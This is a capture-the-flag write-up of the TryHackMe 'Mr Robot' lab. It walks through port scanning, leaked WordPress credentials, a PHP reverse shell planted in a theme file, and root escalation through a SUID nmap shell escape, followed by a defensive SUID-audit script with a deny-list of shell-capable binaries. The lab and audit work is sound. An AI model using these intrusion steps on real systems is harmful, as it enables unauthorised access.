
TryHackMe: Mr Robot CTF


Enumeration

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.167.211 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.167.211
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 23:49 CEST
Nmap scan report for 10.10.167.211
Host is up (0.050s latency).

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds

Flag 1

Then checked robots.txt on port 80, which revealed the first flag together with a wordlist:

root@docker-desktop:~# curl 10.10.106.239/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

Flag 2

Then used that wordlist for a directory brute force:

[Screenshot: Dirsearch]

Found user credentials in one of them:

root@docker-desktop:~/Documents/mrrobot# curl -s http://10.10.75.244/license | tail -n 1 | base64 -d
e****t:ER*****52

Used the credentials to log in to WordPress.

Then, from the administration panel, created a post and used the theme editor to add a PHP reverse shell to footer.php.
Finally requested the post with curl so that the reverse shell would execute:

root@docker-desktop:~/Documents/mrrobot# curl http://10.10.75.244/2020/06/24/aaaa/

Flag 3

Then did some manual enumeration and found an interesting file in the same directory as the next flag:

daemon@linux:/home/robot$ ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Looked up the hash on CrackStation and used the recovered password to log in as robot:

[Screenshot: Dirsearch]

Then enumerated the system with linpeas and found that nmap has the SUID bit set:

[Screenshot: Dirsearch]

Finally looked up nmap on GTFOBins and used it to escalate privileges:

robot@linux:/tmp$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
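As an added defender-side check (not part of the original writeup), the script below audits SUID-root binaries the way linpeas surfaced nmap above, and separates the ones documented as able to spawn a shell from expected set-uid helpers such as passwd. The deny-list, the search roots and the sample entries are assumptions for illustration.

```python
import os
import stat

# Illustrative deny-list (an assumption, not from the writeup): binaries that
# are documented as able to drop into a shell, so a SUID-root bit on them is
# equivalent to handing out root. nmap is the one found on this box.
SHELL_CAPABLE = {"nmap", "vim", "find", "python3", "perl"}


def classify_suid(entries):
    """entries: iterable of (path, st_mode, st_uid) tuples.

    Returns (all_suid_root, risky): every regular file that is SUID and owned
    by root, and the subset whose basename is on the deny-list.
    """
    all_suid_root, risky = [], []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):          # skip dirs, symlinks, devices
            continue
        if not (mode & stat.S_ISUID) or uid != 0:
            continue                        # not SUID, or not root-owned
        all_suid_root.append(path)
        if os.path.basename(path) in SHELL_CAPABLE:
            risky.append(path)
    return sorted(all_suid_root), sorted(risky)


def walk_entries(roots=("/usr", "/bin", "/sbin")):
    """Collect (path, mode, uid) for every file under the given roots,
    silently skipping anything that cannot be stat'ed."""
    out = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)        # lstat: do not follow symlinks
                except OSError:
                    continue
                out.append((p, st.st_mode, st.st_uid))
    return out


if __name__ == "__main__":
    everything, risky = classify_suid(walk_entries())
    print(f"{len(everything)} SUID-root binaries found")
    for p in risky:
        # Remediation: drop the bit and let users run the tool unprivileged.
        print(f"{p}: shell-capable binary is SUID root; fix with: chmod u-s {p}")
```

Run it as root on the audited host; anything it lists under "risky" should be compared against the distribution's expected SUID set before the bit is removed.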

WRITTEN BY
ITasahobby
InTernet lover